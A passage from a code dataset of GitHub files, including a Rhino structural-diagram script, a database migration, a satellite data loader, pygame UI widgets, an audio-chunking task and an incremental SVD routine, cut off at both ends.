datawriter.writerows(final_list)","repo_name":"seeexzet/Task_3.2_regular","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5789675190","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport compas\n\nfrom compas_rhino.utilities import volmesh_from_polysurfaces\n\nfrom compas_3gs.diagrams import FormNetwork\nfrom compas_3gs.diagrams import ForceVolMesh\n\nfrom compas_3gs.algorithms import volmesh_dual_network\nfrom compas_3gs.algorithms import volmesh_reciprocate\n\nfrom compas_3gs.utilities import get_index_colordict\nfrom compas_3gs.utilities import get_force_colors_hf\n\ntry:\n import rhinoscriptsyntax as rs\nexcept ImportError:\n compas.raise_if_ironpython()\n\n\n# ------------------------------------------------------------------------------\n# 1. make vomesh from rhino polysurfaces\n# ------------------------------------------------------------------------------\nlayer = 'force_volmesh'\n\nguids = rs.GetObjects(\"select polysurfaces\", filter=rs.filter.polysurface)\nrs.HideObjects(guids)\n\nforcediagram = ForceVolMesh()\nforcediagram = volmesh_from_polysurfaces(forcediagram, guids)\nforcediagram.layer = layer\nforcediagram.attributes['name'] = layer\n\n\n# ------------------------------------------------------------------------------\n# 2. make dual network from volmesh (form diagram)\n# ------------------------------------------------------------------------------\nlayer = 'form_network'\n\nformdiagram = volmesh_dual_network(forcediagram, cls=FormNetwork)\nformdiagram.layer = layer\nformdiagram.attributes['name'] = layer\n\n# move dual_network\noffset = 2\nwidth = formdiagram.bounding_box()[1][0] - formdiagram.bounding_box()[0][0]\nfor vkey in formdiagram.nodes():\n x = formdiagram.node_attribute(vkey, 'x')\n formdiagram.node_attribute(vkey, 'x', x + width * offset)\n\n\n# ------------------------------------------------------------------------------\n# 3. reciprocate\n# ------------------------------------------------------------------------------\nvolmesh_reciprocate(forcediagram,\n formdiagram,\n kmax=1000,\n weight=1,\n edge_min=0.5,\n edge_max=20,\n tolerance=0.01)\n\n\n# ------------------------------------------------------------------------------\n# 4. visualisation - color id\n# ------------------------------------------------------------------------------\nuv_c_dict = get_index_colordict(list(formdiagram.edges()))\nhf_c_dict = get_force_colors_hf(forcediagram, formdiagram, uv_c_dict=uv_c_dict)\n\nfaces_to_draw = [fkey for fkey in forcediagram.faces() if not forcediagram.is_halfface_on_boundary(fkey)]\n\nforcediagram.clear()\nforcediagram.draw_edges()\nforcediagram.draw_faces(faces=faces_to_draw, color=hf_c_dict)\n\nformdiagram.clear()\nformdiagram.draw_edges(color=uv_c_dict)\n","repo_name":"BlockResearchGroup/compas_3gs","sub_path":"examples/_old_examples/01_70_volmesh_color_id.py","file_name":"01_70_volmesh_color_id.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"36369291213","text":"\"\"\"empty message\n\nRevision ID: 6c1b0006e18f\nRevises: \nCreate Date: 2019-04-14 19:35:06.175655\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6c1b0006e18f\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"team\",\n sa.Column(\"team_id\", sa.Integer(), nullable=False),\n sa.Column(\"name\", sa.String(length=50), nullable=False),\n sa.PrimaryKeyConstraint(\"team_id\"),\n sa.UniqueConstraint(\"name\"),\n )\n op.create_table(\n \"person\",\n sa.Column(\"person_id\", sa.Integer(), nullable=False),\n sa.Column(\"first_name\", sa.String(length=50), nullable=False),\n sa.Column(\"last_name\", sa.String(length=50), nullable=False),\n sa.Column(\"role\", sa.String(length=50), nullable=True),\n sa.Column(\"position\", sa.String(length=50), nullable=True),\n sa.Column(\"team_id\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint([\"team_id\"], [\"team.team_id\"]),\n sa.PrimaryKeyConstraint(\"person_id\"),\n )\n op.create_table(\n \"team_manager\",\n sa.Column(\"manager_id\", sa.Integer(), nullable=False),\n sa.Column(\"manager\", sa.Integer(), nullable=False),\n sa.Column(\"captain\", sa.Integer(), nullable=False),\n sa.Column(\"team\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint([\"captain\"], [\"person.person_id\"]),\n sa.ForeignKeyConstraint([\"manager\"], [\"person.person_id\"]),\n sa.ForeignKeyConstraint([\"team\"], [\"team.team_id\"]),\n sa.PrimaryKeyConstraint(\"manager_id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"team_manager\")\n op.drop_table(\"person\")\n op.drop_table(\"team\")\n # ### end Alembic commands ###\n","repo_name":"andela-football-league/afl-ug-backend","sub_path":"migrations/versions/6c1b0006e18f_.py","file_name":"6c1b0006e18f_.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33850719445","text":"import os, glob, numpy as np, pysatCDF, h5py, itertools\nfrom ttools import config, utils\n\n\nALL_SWARM_FIELDS = (\n 'Latitude', 'Longitude', 'Height', 'Radius', 'SZA', 'SAz', 'ST', 'Diplat', 'Diplon', 'MLat', 'MLT', 'AACGMLat',\n 'AACGMLon', 'n', 'Te_hgn', 'Te_lgn', 'T_elec', 'Vs_hgn', 'Vs_lgn', 'U_SC', 'Flagbits'\n)\n\n\nSWARM_FIELDS_LESS_MAG_COORDS = (\n 'Height', 'Radius', 'SZA', 'SAz', 'ST', 'n', 'Te_hgn', 'Te_lgn', 'T_elec', 'Vs_hgn', 'Vs_lgn', 'U_SC', 'Flagbits'\n)\n\n\nSWARM_NEW_COORDS = (\n 'apex_lat', 'apex_lon', 'qd_lat', 'qd_lon', 'mlt', 'lat', 'lon'\n)\n\n\ndef get_swarm_data(start_date, end_date, sat, data_dir=None, coords_dir=None):\n \"\"\"Gets madrigal TEC and timestamps assuming regular sampling. Fills in missing time steps with NaNs.\n Parameters\n ----------\n start_date, end_date: numpy.datetime64\n sat, data_dir, coords_dir: str\n Returns\n -------\n data: dict\n ref_times: numpy.ndarray[datetime64]\n \"\"\"\n if data_dir is None:\n data_dir = os.path.join(config.swarm_dir, \"extd_efi_lp\")\n if coords_dir is None:\n coords_dir = config.swarm_coords_dir\n fields = SWARM_FIELDS_LESS_MAG_COORDS + SWARM_NEW_COORDS\n\n dt = np.timedelta64(500, 'ms')\n dt_sec = dt.astype('timedelta64[ms]').astype(float)\n start_date = (np.ceil(start_date.astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec).astype('datetime64[ms]')\n end_date = (np.ceil(end_date.astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec).astype('datetime64[ms]')\n ref_times = np.arange(start_date, end_date, dt)\n ref_times_ut = ref_times.astype('datetime64[ms]').astype(float)\n data = {f: np.ones(ref_times.shape[0]) * np.nan for f in fields}\n file_dates = np.unique(ref_times.astype('datetime64[D]'))\n file_dates = utils.decompose_datetime64(file_dates)\n for i in range(file_dates.shape[0]):\n y = file_dates[i, 0]\n m = file_dates[i, 1]\n d = file_dates[i, 2]\n files = glob.glob(os.path.join(data_dir, f\"SW_EXTD_EFI{sat.upper()}_LP_HM_{y:04d}{m:02d}{d:02d}*.cdf\"))\n files = filter_swarm_files(files)\n for fn in files:\n file_data = open_swarm_file(fn)\n coords_fn = os.path.join(coords_dir, f\"{utils.no_ext_fn(fn)}_coords.h5\")\n file_data.update(open_swarm_coords_file(coords_fn))\n file_times_ut = (np.floor(file_data['Timestamp'].astype('datetime64[ms]').astype(float) / dt_sec) * dt_sec)\n # assume ut is increasing and has no repeating entries, basically that it is a subset of ref_times_ut\n r_mask = np.in1d(ref_times_ut, file_times_ut)\n c_mask = np.in1d(file_times_ut, ref_times_ut)\n for f in fields:\n if f in file_data:\n data[f][r_mask] = file_data[f][c_mask]\n return data, ref_times\n\n\ndef filter_swarm_files(files):\n \"\"\"given a list of SWARM filenames, returns a list only including the latest version of each file\n Parameters\n ----------\n files: list[str]\n Returns\n -------\n list[str]\n \"\"\"\n result = []\n base = [(os.path.split(fn)[0], utils.no_ext_fn(fn)) for fn in files]\n splitup = [(b[:-4], b[-4:], a) for a, b in base]\n splitup = sorted(splitup, key=lambda x: x[0])\n for key, grp in itertools.groupby(splitup, lambda x: x[0]):\n latest_version = sorted(grp, key=lambda x: x[1])[-1]\n result.append(os.path.join(latest_version[2], f\"{latest_version[0]}{latest_version[1]}.cdf\"))\n return result\n\n\ndef open_swarm_file(fn):\n \"\"\"Opens a SWARM file\n Parameters\n ----------\n fn: str\n Returns\n -------\n dict\n Timestamp\n Latitude\n Longitude\n Height: m Height above WGS84 reference ellipsoid.\n Radius: m Distance from the Earth’s centre.\n SZA: deg Solar Zenith Angle.\n SAz: deg Solar azimuth in Earth frame, north is 0 deg.\n ST: hour Apparent solar time\n Diplat: deg Quasi-dipole latitude\n Diplon\n MLT: hour Magnetic local time based on quasi-dipole\n AACGMLat: deg Altitude-adjusted corrected geomagnetic latitude\n AACGMLon\n n: cm-3 Plasma density from ion current\n Te_hgn: K Electron temperature, estimated by the high gain probe\n Te_lgn: K Electron temperature, estimated by the low gain probe\n Te: K Electron temperature, blended value\n Vs_hgn: V Spacecraft potential, estimated by the high gain probe\n Vs_lgn: V Spacecraft potential, estimated by the low gain probe\n Vs: V Spacecraft potential, blended value\n Flagbits\n \"\"\"\n with pysatCDF.CDF(fn) as f:\n data = f.data\n print(f\"Opened swarm file: {fn}, size: {data['Timestamp'].shape}\")\n return data\n\n\ndef open_swarm_coords_file(fn):\n \"\"\"Opens precomputed swarm coordinates h5 file (one per swarm cdf file)\n Parameters\n ----------\n fn: str\n Returns\n -------\n dict of numpy.ndarray[float]\n keys: 'apex_lat', 'apex_lon', 'qd_lat', 'qd_lon', 'mlt'\n \"\"\"\n coords = {}\n with h5py.File(fn, 'r') as f:\n coords['apex_lat'] = f['apex_lat'][()]\n coords['apex_lon'] = f['apex_lon'][()]\n coords['qd_lat'] = f['qd_lat'][()]\n coords['qd_lon'] = f['qd_lon'][()]\n coords['mlt'] = f['mlt'][()]\n coords['lat'] = f['lat'][()]\n coords['lon'] = f['lon'][()]\n print(f\"Opened swarm coords file: {fn}, size: {coords['apex_lat'].shape}\")\n return coords\n\n\n\"\"\"\nCreate trough dataset:\n 0: No trough\n 1: Non-SAPS trough\n 2: SAPS trough\n 3: unknown trough\n\nProcedure:\n 1. identify what trough connected component DMSP is passing trough, label the CC as saps or non-saps\n 2. identify location of \n\nCreate plots:\n (low, medium, high Kp) x (SAPS, no SAPS)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binned_statistic_dd\nimport bottleneck as bn\n\nfrom ttools import io, plotting, utils, config, satellite\n\ntrough_data = np.load(\"C:\\\\Users\\\\Greg\\\\data\\\\dataset.npz\")\ntrough = trough_data['trough']\ntec_times = trough_data['time']\ntec_ut = tec_times.astype(int)\nX = -1 * trough_data['x']\nX[~trough] = np.nan\nkp = io.get_kp(tec_times)\n\nif True:\n batch_size = 100\n flow_grid_count = np.empty_like(X)\n flow_grid_sum = np.empty_like(X)\n for batch in range(int(np.ceil(trough.shape[0] / batch_size))):\n print(batch, np.ceil(trough.shape[0] / batch_size))\n i1 = batch * batch_size\n i2 = min((batch + 1) * batch_size, trough.shape[0] - 1)\n start = tec_times[i1]\n end = tec_times[i2] + np.timedelta64(1, 'h')\n dmsp, dmsp_times = io.get_dmsp_data(start, end)\n\n bins = [np.arange(start, end, np.timedelta64(1, 'h')), np.arange(29.5, 90),\n np.arange(-12, 12 + 24 / 360, 48 / 360)]\n t = []\n mlat = []\n mlt = []\n flow = []\n for sat, sat_data in dmsp.items():\n t.append(dmsp_times.astype(int))\n mlat.append(sat_data['mlat'])\n mlt.append(sat_data['mlt'])\n flow.append(sat_data['hor_ion_v'])\n t, mlat, mlt, flow = utils.concatenate(t, mlat, mlt, flow)\n mlt[mlt > 12] -= 24\n sample = np.column_stack((t, mlat, mlt))\n mask = (mlat >= 30) & np.isfinite(flow)\n flow_grid_count[i1:i2] = binned_statistic_dd(sample[mask], flow[mask], 'count', bins).statistic\n flow_grid_sum[i1:i2] = binned_statistic_dd(sample[mask], flow[mask], 'sum', bins).statistic\n\n starts, stops = satellite.get_closest_segment(dmsp_times, dmsp['dmsp16']['mlat'], tec_times[i1:i2], 30)\n for start, stop in zip(starts, stops):\n saps = satellite.find_troughs_in_segment(dmsp['dmsp16']['mlat'][start:stop],\n -dmsp['dmsp16']['hor_ion_v'][start:stop], -300)\n plt.plot(dmsp['dmsp16']['hor_ion_v'][start:stop])\n for sap in saps:\n m, e1, e2 = sap\n plt.plot(m, dmsp['dmsp16']['hor_ion_v'][start:stop][m], 'rx')\n plt.show()\n\n np.savez('E:\\\\dmsp_flow\\\\flow_grid.npz', flow_grid_count=flow_grid_count, flow_grid_sum=flow_grid_sum)\n\n# fig, ax = plt.subplots(subplot_kw={'polar': True})\n# for sat, sat_data in dmsp.items():\n# m = sat_data['mlat'] > 30\n# ax.plot((sat_data['mlt'][m] - 6) * np.pi / 12, 90 - sat_data['mlat'][m], '.', label=sat)\n# plotting.format_polar_mag_ax(ax)\n# plt.legend()\n# plt.show()\n\nflow_data = np.load('E:\\\\dmsp_flow\\\\flow_grid.npz')\nfg_sum = flow_data['flow_grid_sum']\nfg_count = flow_data['flow_grid_count']\nfg_sum[~trough] = 0\nfg_count[~trough] = 0\n\nfg = fg_sum / fg_count\nsaps = fg > 500\nnon_saps = fg < 500\n\"\"\"","repo_name":"gregstarr/ttools","sub_path":"ttools/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34127533894","text":"import utils \nimport sys\nimport networkx as nx\nfrom pyvis.network import Network\n\ndata_file = 'data.xml'\ndata_root = utils.getRoot(data_file)\n\nmap_file = 'map.xml'\nmap_root = utils.getRoot(map_file)\n\nmap_list = []\n\"\"\"\n map_list = list of mapping \n mapping = (task, node)\n\"\"\"\nfor bind in map_root.findall('bind'):\n task = bind.find('task').get('value')\n node = bind.find('node').get('value')\n map_list.append((int(task), int(node)))\n\ntasks_list = []\n\"\"\"\n tasks_list = list of tasks\n task = [id, requirement, generate]\n\"\"\"\nfor tasks in data_root.findall('tasks'):\n for task in tasks:\n single_task = []\n requirement_dict = {} \n task_id = task.attrib['id']\n single_task.append(task_id)\n for requirement in task.findall(\".//requires/requirement\"): \n type_value = requirement.find('type').get('value')\n source_value = requirement.find('source').get('value')\n count_min = requirement.find('count').get('min')\n requirement_dict['type'] = type_value\n requirement_dict['source'] = source_value\n requirement_dict['count_min'] = count_min\n\n single_task.append(requirement_dict)\n \n destination_dict = {} \n for destination in task.findall(\".//generates/possibility/destinations/destination\"): \n count = destination.find('count').get('min')\n type = destination.find('type').get('value')\n dest = destination.find('task').get('value')\n destination_dict['count'] = count \n destination_dict['type'] = type \n destination_dict['dest'] = dest \n \n single_task.append(destination_dict)\n tasks_list.append(single_task)\n\nprint(\"\\n--- Results ---\")\n\nprint(\"\\nRequire + Generate Info\")\nfor task in tasks_list:\n print(task)\n\nprint(\"\\nMapping\")\nprint(map_list)\n\n\nprint(\"\\nStarting Serious Business\")\n\nnet = Network(notebook=True, directed=True)\n\nfor bind in map_list:\n task = bind[0]\n node = bind[1]\n\n net.add_node(node)\n net.nodes[node][\"id\"] = task\n\n\n\n\n\n# for i in range(len(map_list)):\n# for task in tasks_list:\n# node_id = net.nodes[i]['id']\n# if node_id == int(task[0]):\n# \"\"\"Checking Generate\"\"\"\n# if len(task[2]) != 0:\n\n# print(\"Generate is not empty\")\n# net.add_edge(node_id, int(task[2]['dest']), label=\"G\", \n# count=task[2]['count'], \n# type=task[2]['type'])\n\n# \"\"\"Checking Require\"\"\"\n# if len(task[1]) != 0:\n# print(\"Require is not Empty\")\n# net.add_edge(node_id, int(task[1]['source']), label=\"R\", \n# count=task[1]['count_min'], \n# type=task[1]['type'])\n\n\n\n# # print(G.edges(data=True))\n# # utils.getNodeAttributes(G)\n# utils.visMultiDiGraph(net)","repo_name":"faseelmo/noc_graphs-","sub_path":"taskMap_vis.py","file_name":"taskMap_vis.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28464188054","text":"# Lab 5 - 1 - 2\n# Nitin Nallagatla | CS7 | Summer 2019\n\nimport random\n\nprint(\"SAMPLE CLOCK DISPLAY\")\n\n# For loop calculates hours.\nfor n in range(1):\n randomHours = random.randint(1, 12)\n\n # For loop calculates minutes.\n for i in range(1):\n randomMinutes = random.randint(1, 59)\n\n # Calculates seconds and adds ten seconds to previous counts for 6 displays per minute.\n for t in range(6):\n print(format(randomHours, '02d'), \":\", format(randomMinutes, '02d'), \":\", format(randomSeconds, '02d'), sep='')\n randomSeconds = randomSeconds + 10\n","repo_name":"nitin-nallagatla/LasPositasCollege","sub_path":"CS7/5 - 1 Problems/5 - 1 - 2 by Nitin Nallagatla.py","file_name":"5 - 1 - 2 by Nitin Nallagatla.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6710279175","text":"import pygame # , win32clipboard\n\nfrom components.componentsystem import Component\n\n\"\"\"\nI feel like all this code is kinda boring and self-explanatory, so I'm not gonna comment it. (Good luck :D)\n\"\"\"\n\npygame.font.init()\nDEFAULT_FONT = pygame.font.SysFont(\"Arial\", 20)\n\nclass ProgressBar(Component):\n def __init__(self, location: tuple[int, int], \n size: tuple[int, int], value: int = 0, max_value: int = 100,\n bar_color: tuple[int, int, int] = (0, 255, 0),\n background_color: tuple[int, int, int] = (255, 255, 255),\n border_color: tuple[int, int, int] = (0, 0, 0),\n border_radius: int = 0, text_display: bool = False, text_color: tuple[int, int, int] = (0, 0, 0),\n text_font: pygame.font.Font = DEFAULT_FONT):\n \n super().__init__(location, size)\n self.value = value\n self.max = max_value\n self.bar_color = bar_color\n self.background_color = background_color\n self.border_color = border_color\n self.border_radius = border_radius\n self.text_display = text_display\n self.text_color = text_color\n self.text_font = text_font\n\n def draw(self, surface: pygame.Surface, environment: dict):\n self.value = max(0, min(self.value, self.max))\n pygame.draw.rect(surface, self.border_color, (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n pygame.draw.rect(surface, self.background_color, (self.location[0] + 1, self.location[1] + 1, self.size[0] - 2, self.size[1] - 2), border_radius=self.border_radius)\n pygame.draw.rect(surface, self.bar_color, (self.location[0] + 1, self.location[1] + 1, (self.size[0] - 2) * (self.value / self.max), self.size[1] - 2), border_radius=self.border_radius)\n\n if self.text_display:\n # draw the text in the center of the bar\n text = self.text_font.render(f\"{int(self.value)}/{int(self.max)}\", True, self.text_color)\n surface.blit(text, (self.location[0] + (self.size[0] / 2) - (text.get_width() / 2), self.location[1] + (self.size[1] / 2) - (text.get_height() / 2)))\n\nclass TextDisplay(Component):\n def __init__(self, location: tuple[int, int], text: str,\n font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (0, 0, 0)):\n super().__init__(location, (0, 0))\n self.text = text\n self.font = font\n self.color = color\n\n def setText(self, text: str):\n self.text = text\n \n def draw(self, surface: pygame.Surface, environment: dict):\n surface.blit(self.font.render(self.text, True, self.color), self.location)\n\nclass ImageDisplay(Component):\n def __init__(self, location: tuple[int, int], image: pygame.Surface):\n super().__init__(location, (0, 0))\n self.image = image\n \n def draw(self, surface: pygame.Surface, environment: dict):\n surface.blit(self.image, self.location)\n\nclass TextInput(Component):\n def __init__(self, location: tuple[int, int], size: tuple[int, int], text: str = \"\",\n font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (0, 0, 0),\n prompt_text: str = \"Enter text...\", prompt_color: tuple[int, int, int] = (200, 200, 200),\n prompt_font: pygame.font.Font = DEFAULT_FONT,\n border_radius: int = 0,\n background_color: tuple[int, int, int] = (0, 0, 0),\n text_color: tuple[int, int, int] = (255, 255, 255),\n padding_left: int = 5, padding_right: int = 0,\n padding_top: int = 0, padding_bottom: int = 0,\n max_length: int = -1):\n\n super().__init__(location, size)\n self.EVENT_SYSTEM_HOOKED = True # Tells the event system to give this component events\n\n # Display config ===============================\n self.text = text\n self.font = font\n self.color = color\n self.prompt_text = prompt_text\n self.prompt_color = prompt_color\n self.prompt_font = prompt_font\n self.border_radius = border_radius\n self.background_color = background_color\n self.text_color = text_color\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.max_length = max_length\n\n self.CARET_BLINK_TIME = 500 # ms\n self._caret_blink_timer = 0\n self._caret_visible = True\n\n # Internal config ==============================\n self._selected = False\n self._keys_pressed = []\n\n \n def draw(self, surface: pygame.Surface, environment: dict):\n if self._caret_visible:\n self._caret_blink_timer -= environment[\"time_delta\"]\n if self._caret_blink_timer <= 0:\n self._caret_blink_timer = self.CARET_BLINK_TIME\n self._caret_visible = False\n else:\n self._caret_blink_timer -= environment[\"time_delta\"]\n if self._caret_blink_timer <= 0:\n self._caret_blink_timer = self.CARET_BLINK_TIME\n self._caret_visible = True\n\n pygame.draw.rect(surface, self.background_color, (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n\n # if the padding is 0 on top and bottom, then the text will be centered\n if self.padding_top == 0 and self.padding_bottom == 0:\n textY = self.location[1] + (self.size[1] / 2) - (self.font.size(self.text)[1] / 2)\n else: textY = self.location[1] + self.padding_top\n\n # if the padding is 0 on left and right, then the text will be centered\n if self.padding_left == 0 and self.padding_right == 0: \n textX = self.location[0] + (self.size[0] / 2) - (self.font.size(self.text)[0] / 2)\n else: textX = self.location[0] + self.padding_left\n\n visableText = self.text\n if self._selected and self._caret_visible:\n visableText += \"|\"\n else: visableText += \" \" # stop the text from jumping around when the caret is not visible\n while self.font.size(visableText)[0] > self.size[0] - self.padding_left - self.padding_right:\n # trim a chracter off the front of the text\n visableText = visableText[1:]\n\n if self.text.strip() == \"\" and not self._selected:\n surface.blit(self.font.render(self.prompt_text, True, self.prompt_color), (textX, textY))\n else:\n surface.blit(self.font.render(visableText, True, self.text_color), (textX, textY))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]:\n self._selected = True\n else:\n self._selected = False\n\n if event.type == pygame.KEYDOWN:\n if self._selected:\n # check if ctrl and v are pressed\n if pygame.K_LCTRL in self._keys_pressed and event.key == pygame.K_v:\n # get the text from the clipboard\n # win32clipboard.OpenClipboard()\n # self.text += win32clipboard.GetClipboardData()\n # win32clipboard.CloseClipboard()\n if self.max_length != -1 and len(self.text) > self.max_length:\n self.text = self.text[:self.max_length]\n elif event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n if self.max_length == -1 or len(self.text) < self.max_length:\n self.text += event.unicode\n if event.key not in self._keys_pressed:\n self._keys_pressed.append(event.key)\n elif event.type == pygame.KEYUP:\n if event.key in self._keys_pressed:\n self._keys_pressed.remove(event.key)\n\nclass Button(Component):\n def __init__(self, location: tuple[int, int], size: tuple[int, int], text: str = \"\",\n font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (255, 255, 255),\n background_color: tuple[int, int, int] = (0, 0, 0),\n hover_background_color: tuple[int, int, int] = (0, 0, 0),\n border_radius: int = 0,\n padding_left: int = 0, padding_right: int = 0,\n padding_top: int = 0, padding_bottom: int = 0,\n on_click: callable = lambda: None):\n super().__init__(location, size)\n self.EVENT_SYSTEM_HOOKED = True # Tells the event system to give this component events\n\n self.text = text\n self.font = font\n self.color = color\n self.background_color = background_color\n self.border_radius = border_radius\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.hover_background_color = hover_background_color\n self.on_click = on_click\n\n self._hovered = False\n\n def draw(self, surface: pygame.Surface, environment: dict):\n pygame.draw.rect(surface, (self.background_color if not self._hovered else self.hover_background_color), (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n\n # if the padding is 0 on top and bottom, then the text will be centered\n if self.padding_top == 0 and self.padding_bottom == 0:\n textY = self.location[1] + (self.size[1] / 2) - (self.font.size(self.text)[1] / 2)\n else: textY = self.location[1] + self.padding_top\n\n # if the padding is 0 on left and right, then the text will be centered\n if self.padding_left == 0 and self.padding_right == 0: \n textX = self.location[0] + (self.size[0] / 2) - (self.font.size(self.text)[0] / 2)\n else: textX = self.location[0] + self.padding_left\n\n surface.blit(self.font.render(self.text, True, self.color), (textX, textY))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]):\n self.on_click()\n\n elif event.type == pygame.MOUSEMOTION:\n self._hovered = (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1])\n \nclass ImageButton(Component):\n def __init__(self, location: tuple[int, int], image: pygame.Surface, \n click_image: pygame.Surface = None, \n hover_image: pygame.Surface = None, on_click: callable = lambda: None,\n text: str = None, font: pygame.font.Font = DEFAULT_FONT, text_color: tuple[int, int, int] = (255, 255, 255)):\n super().__init__(location, image.get_size())\n self.EVENT_SYSTEM_HOOKED = True\n\n self.image = image\n self.click_image = click_image\n self.hover_image = hover_image\n self.on_click = on_click\n self.text = text\n self.font = font\n self.text_color = text_color\n\n self._hovered = False\n \n def draw(self, surface: pygame.Surface, environment: dict):\n if self._hovered and self.hover_image:\n surface.blit(self.hover_image, self.location)\n else:\n surface.blit(self.image, self.location)\n \n if self.text:\n surface.blit(self.font.render(self.text, True, self.text_color), (self.location[0] + self.size[0] / 2 - self.font.size(self.text)[0] / 2, \n self.location[1] + self.size[1] / 2 - self.font.size(self.text)[1] / 2))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]):\n self.on_click()\n\n elif event.type == pygame.MOUSEMOTION:\n self._hovered = (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1])","repo_name":"DylanBruner/SurvivalGame","sub_path":"components/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":12684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41828901765","text":"\n# %% Packages\n\nimport os\nfrom pydub import AudioSegment\nfrom pydub.utils import make_chunks\nfrom ml_classes.task import MLTask\nfrom tqdm import tqdm\n\n# %% Classes\n\n\nclass CreateSoundSnippets(MLTask):\n \"\"\"This task chops a longer track into smaller sound pieces\"\"\"\n\n name = \"make_chunks\"\n\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n\n def run(self):\n\n # Delete existing files and create necessary folders\n self.clear_output_path()\n\n # Chop the long sound-track\n self.chopping_sound()\n\n def chopping_sound(self) -> None:\n \"\"\"This file takes the (large) inputted sound file and then chops\n it down into smaller pieces. Every single snippet is then\n saved as a wav file itself. To keep better track, an intuitive\n naming system is used. Through that the files are staying ordered.\n \"\"\"\n input_path = self.paths.get_string(\"input_path\")\n output_path = self.paths.get_string(\"output_path\")\n chunk_length_ms = self.parameters.get_int(\"chunk_length_ms\")\n\n mix_files = [x for x in os.listdir(input_path) if x.endswith(\".wav\")]\n for file in mix_files:\n file_path = os.path.join(input_path, file)\n myaudio = AudioSegment.from_file(file_path, \"wav\")\n chunks = make_chunks(myaudio, chunk_length_ms)\n number_of_digits_of_length = len(str(len(chunks)))\n category_name = file.split(\"_mix\")[0]\n\n for i, chunk in tqdm(enumerate(chunks)):\n padding = number_of_digits_of_length - len(str(i))\n chunk_name = f\"{category_name}_{padding*'0'}{str(i)}.wav\"\n file_output_path = os.path.join(output_path, chunk_name)\n chunk.export(file_output_path, format=\"wav\")\n","repo_name":"data4help/crispy-train","sub_path":"src/tasks/etl/create_snippets.py","file_name":"create_snippets.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6507692517","text":"import numpy as np\nimport scipy.linalg as la\n\n\ndef incremental_svd_cols(u, s, vt, B, k):\n s = np.diag(s)\n cat_usb = np.concatenate((u @ s, B), axis=1)\n Q, R = la.qr(cat_usb, mode='full')\n u_bar, s_bar, vt_bar = la.svd(R)\n u_bar = u_bar[:, :k]\n s_bar = s_bar[:k]\n vt_bar = vt_bar[:k, :]\n\n v_correction = np.zeros((vt.shape[0] + B.shape[1], vt.shape[1] + B.shape[1]))\n v_correction[:vt.shape[0], :vt.shape[1]] = vt\n idxs_row = range(vt.shape[0], vt.shape[0] + B.shape[1])\n idxs_col = range(vt.shape[1], vt.shape[1] + B.shape[1])\n v_correction[idxs_row, idxs_col] = 1\n\n u_res = Q @ u_bar\n s_res = s_bar\n vt_res = vt_bar @ v_correction\n\n u_res, vt_res = svd_sign_flip(u_res, vt_res)\n return u_res, s_res, vt_res\n\n\ndef svd_sign_flip(u, v=None):\n \"\"\" Solve sign indeterminacy for SVD decomposition.\n from sklearn/utils/extmath.py/_deterministic_vector_sign_flip\n \"\"\"\n if v is not 